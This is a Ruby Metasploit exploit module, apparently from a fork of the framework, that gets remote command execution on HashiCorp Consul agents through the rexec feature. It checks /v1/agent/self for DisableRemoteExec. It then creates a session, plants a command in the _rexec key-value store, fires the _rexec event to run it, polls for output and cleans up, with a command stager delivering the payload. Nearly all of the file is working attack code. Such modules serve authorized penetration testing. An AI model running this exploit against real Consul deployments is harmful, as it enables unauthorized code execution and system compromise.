metasploit-gs/modules/exploits/multi/misc/consul_rexec_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Hashicorp Consul Remote Command Execution via Rexec",
      'Description'    => %q{
        This module exploits a feature of Hashicorp Consul named rexec.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bharadwaj Machiraju', # Discovery and PoC
          'Francis Alexander', # Discovery and PoC
          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],
          [ 'URL', 'https://www.consul.io/docs/commands/exec.html'],
          [ 'URL', 'https://github.com/torque59/Garfield' ]
        ],
      'Platform'        => 'linux',
      'Targets'         => [ [ 'Linux', {} ] ],
      'Payload'         => {},
      'CmdStagerFlavor' => [ 'bourne' ],
      'Privileged'     => false,
      'DefaultOptions' =>
      {
         'SSL' => false,
         'RPORT' => 8500
      },
      'DefaultTarget'  => 0))
    deregister_options('SRVHOST', 'SRVPORT', 'SSLCert', 'URIPATH')
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path', '/'])
      ])
  end


  def check
    uri = target_uri.path
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(uri, "/v1/agent/self"),
    })
    if res and res.code == 200
      begin
        agent_info = JSON.parse(res.body)
        if agent_info["Config"]["DisableRemoteExec"] == false
          return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
      rescue JSON::ParserError
        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
      end
    end
    Exploit::CheckCode::Unknown
  end


  def execute_command(cmd, opts = {})
    uri = target_uri.path

    print_status('Creating session.')
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/session/create'),
      'ctype' => 'application/json',
      'data' => '{"Behavior":"delete","Name":"Remote Exec","TTL":"15s"}'
    })
    if res and res.code == 200
      begin
        sess = JSON.parse(res.body)
        print_status("Got rexec session ID #{sess['ID']}")
      rescue JSON::ParseError
        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
      end
    end

    # unicode encoding for redirection characters. does not work otherwise.
    cmd = cmd.gsub! '>', '\u003e'
    cmd = cmd.gsub! '&', '\u0026'

    print_status("Setting command for rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
      'ctype' => 'application/json',
      'data' => "{\"Command\":\"#{cmd}\",\"Wait\":2000000000}"
    })
    if res and not res.code == 200 or res.body == 'false'
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end

    print_status("Triggering execution on rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
      'ctype' => 'application/json',
      'data' => "{\"Prefix\":\"_rexec\",\"Session\":\"#{sess['ID']}\"}"
    })
    if res and not res.code == 200
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end

    found = false
    while not found
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms")
      })
      begin
        data = JSON.parse(res.body)
        for path in data
          if path.include? "out"
            found = true
          end
        end
      rescue JSON::ParseError
        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
      end
      sleep 2
    end

    print_status("Cleaning up rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
    })

    if res and not res.code == 200 or res.body == 'false'
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end

    res = send_request_cgi({
      'method' => 'DELETE',
      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
    })

    if res and not res.code == 200 or res.body == 'false'
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end
  end

  def exploit
    execute_cmdstager()
  end
end